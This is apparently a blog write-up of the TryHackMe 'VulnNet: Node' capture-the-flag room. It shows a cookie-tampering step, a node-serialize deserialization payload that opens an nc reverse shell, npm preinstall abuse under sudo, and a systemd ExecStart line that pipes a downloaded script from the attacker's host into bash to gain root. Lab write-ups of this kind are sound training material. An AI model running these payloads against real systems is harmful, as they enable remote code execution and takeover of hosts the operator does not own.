TryHackMe:VulnNet: Node
--
Today we will take a look at TryHackMe:VulnNet: Node. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
sudo nmap -p- -sCV --open 10.10.41.219PORT STATE SERVICE VERSION
8080/tcp open http Node.js Express framework
|_http-title: VulnNet – Your reliable news source – Try Now!
|_http-open-proxy: Proxy might be redirecting requests
- Web
When we first look at it, it greets us as a guest.
Let’s refresh the page and catch the request with burpsuite.
When we look at the request, we see that the website gives us cookie. Let’s decode and look at the contents.
We see that he marks us as guests. Replacing with admin and sending the request again.
We see that the response is “Welcome Admin”. It worked. But when we try to log in, we see that he wants the password again.
I received such an answer when I changed the cookie.
I pasted the sentence on Google. There is such an article.
It’s time to get the reverse shell.
- Reverse Shell
{"username":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()","isAdmin":true,"encoding": "utf-8"}Encode and send request.
Listen:
Command: nc -nvlp 4444
- serv-manage
After logging in:
Command: script /dev/null -c bashCommand: export TERM=xtermCtrl + zCommand: stty raw -echo ; fgCommand: resetwww@vulnnet-node:~/VulnNet-Node$ sudo -l
Matching Defaults entries for www on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www may run the following commands on vulnnet-node:
(serv-manage) NOPASSWD: /usr/bin/npm
www@vulnnet-node:~/VulnNet-Node$ mkdir exploitwww@vulnnet-node:~/VulnNet-Node$ echo '{"scripts": {"preinstall": "/bin/bash"}}' > exploit/package.jsonwww@vulnnet-node:~/VulnNet-Node$ sudo -u serv-manage npm -C exploit --unsafe-perm i
- Root
serv-manage@vulnnet-node:/home/www/VulnNet-Node/exploit$ sudo -l
Matching Defaults entries for serv-manage on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User serv-manage may run the following commands on vulnnet-node:
(root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl daemon-reloadserv-manage@vulnnet-node: locate vulnnet-auto.timerserv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-auto.timer--------------------------------
[Unit]
Description=Run VulnNet utilities every 30 min
[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/30
Unit=vulnnet-job.service
[Install]
WantedBy=basic.target
--------------------------------serv-manage@vulnnet-node: locate vulnnet-job.serviceserv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-job.service---------------------------------
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer
[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/df
[Install]
WantedBy=multi-user.target
---------------------------------
We see something like this here. “ExecStart = / bin / df” Here we can execute the command and get the reverse shell.
First, let’s prepare a payload on our own machine.
Exploit.sh
$ nano exploit.sh#!/bin/bashbash -i >& /dev/tcp/Your_IP/4242 0>&1
Command: python3 -m http.server 80
In the target machine
ExecStart=/bin/bash -c "curl http://Your_İP/exploit.sh | bash"Local machine:
Command: nc -nvlp 4242
In the target machine
serv-manage@vulnnet-node: sudo -u root /bin/systemctl stop vulnnet-auto.timerserv-manage@vulnnet-node: sudo -u root /bin/systemctl start vulnnet-auto.timer
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
![How I hacked 28 sites at once [RCE]](https://miro.medium.com/v2/resize:fit:1358/0*Eo-W4wKEH9PSMDAb.png)
![Dav Tryhackme Writeup [Detailed]](https://miro.medium.com/v2/resize:fit:1358/1*iIpvyAnKbUs4XFlv9mK0Rg.png)
